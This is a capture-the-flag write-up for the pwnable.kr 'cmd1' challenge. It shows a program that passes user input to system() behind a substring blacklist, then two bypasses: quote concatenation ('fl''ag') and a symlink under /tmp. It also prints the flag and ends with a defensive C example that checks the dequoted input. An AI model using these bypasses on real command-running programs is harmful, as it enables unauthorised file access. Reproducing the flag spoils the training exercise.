pwnable.kr-cmd1

Challenge description:

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

The source of cmd1.c is:

#include <stdio.h>
#include <stdlib.h>   /* putenv(), system() */
#include <string.h>

/* Substring blacklist: returns the number of forbidden words found in cmd.
 * Note that it inspects the raw argument, not what /bin/sh will execute. */
int filter(char* cmd){
 int r=0;
 r += strstr(cmd, "flag")!=0;
 r += strstr(cmd, "sh")!=0;
 r += strstr(cmd, "tmp")!=0;
 return r;
}
int main(int argc, char* argv[], char** envp){
 /* PATH is replaced with a bogus directory, so bare command names
  * (cat, ls, ...) cannot be resolved; only absolute/relative paths work. */
 putenv("PATH=/fuckyouverymuch");
 if(filter(argv[1])) return 0;
 system( argv[1] );   /* argv[1] is handed to /bin/sh -c unchanged */
 return 0;
}

It looks like flag, sh and tmp are filtered out, but that does not matter: the shell concatenates adjacent quoted pieces into one word, so the check can be bypassed with the following argument:

"/bin/cat 'fl''ag'"

[email protected]:~$ ./cmd1 "/bin/cat 'fl''ag'"
mommy now I get what PATH environment is for 🙂

So the final flag is:

mommy now I get what PATH environment is for 🙂


Update: here is another method:

[email protected]:~$ ls
cmd1 cmd1.c flag
[email protected]:~$ mkdir /tmp/cmd1
[email protected]:~$ cd /tmp/cmd1
[email protected]:/tmp/cmd1$ ln -s /home/cmd1/cmd1 cmd1
[email protected]:/tmp/cmd1$ ls
cmd1
[email protected]:/tmp/cmd1$ ln -s /home/cmd1/flag f
[email protected]:/tmp/cmd1$ ./cmd1 "/bin/cat f"
mommy now I get what PATH environment is for 🙂

By creating symlinks under /tmp, the filter on "flag" is bypassed: the argument "/bin/cat f" contains none of the forbidden substrings, and the link f only resolves to the flag file when cat opens it.
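Both methods above work for the same reason: filter() inspects the raw argv[1] string, while /bin/sh (via system()) and the filesystem (via the symlink) interpret it differently afterwards. The following added example, which is not part of the original writeup or the challenge, makes that gap explicit. It reproduces the challenge's filter() and adds a hypothetical helper, sh_unquote(), that applies POSIX shell quote removal so the blacklist can be evaluated on the words the shell will actually see. The quoting bypass is caught that way; the symlink bypass is not, which is the point: a substring blacklist on a command string is not a security boundary, and the only robust fix is to never pass user input to a shell (exec a fixed binary with an argv array and validate the resolved path instead).

```c
#include <stdio.h>
#include <string.h>

/* The challenge's substring blacklist, reproduced for comparison. */
int filter(const char *cmd)
{
    int r = 0;
    r += strstr(cmd, "flag") != 0;
    r += strstr(cmd, "sh") != 0;
    r += strstr(cmd, "tmp") != 0;
    return r;
}

/* Hypothetical helper (not from the challenge): POSIX sh quote removal.
 * Handles '...', "..." and backslash escapes, writing the dequoted text
 * to out (at most outsz-1 bytes). Returns the number of bytes written.
 * This is what /bin/sh -c does to the string before looking up words. */
size_t sh_unquote(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    int in_single = 0, in_double = 0;

    for (; *in && n + 1 < outsz; in++) {
        char c = *in;
        if (in_single) {
            if (c == '\'') in_single = 0;   /* closing quote is dropped */
            else out[n++] = c;               /* everything literal inside '...' */
        } else if (c == '\\' && in[1]) {
            /* inside "..." only $ ` " \ and newline are escapable */
            if (!in_double || strchr("$`\"\\\n", in[1]))
                out[n++] = *++in;
            else
                out[n++] = c;
        } else if (c == '\'' && !in_double) {
            in_single = 1;                   /* opening quote is dropped */
        } else if (c == '"') {
            in_double = !in_double;          /* quotes are dropped */
        } else {
            out[n++] = c;
        }
    }
    out[n] = '\0';
    return n;
}

/* Run the blacklist on the dequoted form instead of the raw argument. */
int filter_after_unquote(const char *cmd)
{
    char buf[256];
    sh_unquote(cmd, buf, sizeof buf);
    return filter(buf);
}

int main(void)
{
    /* Constructed sample arguments: the two bypasses from the writeup plus
     * a plain attempt and a backslash variant. */
    const char *samples[] = {
        "/bin/cat flag",        /* rejected by both checks */
        "/bin/cat 'fl''ag'",    /* raw check passes, dequoted check rejects */
        "/bin/cat fl\\ag",      /* backslash variant, same outcome */
        "/bin/cat f",           /* symlink trick: passes both; path must be resolved */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-22s raw=%d dequoted=%d\n", samples[i],
               filter(samples[i]), filter_after_unquote(samples[i]));
    return 0;
}
```

Running it shows "raw=0 dequoted=1" for the quoted and backslashed forms and "raw=0 dequoted=0" for "/bin/cat f": the first gap is closed by checking the canonical form, the second can only be closed by resolving paths (for example with realpath(3)) or, better, by not invoking a shell at all.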
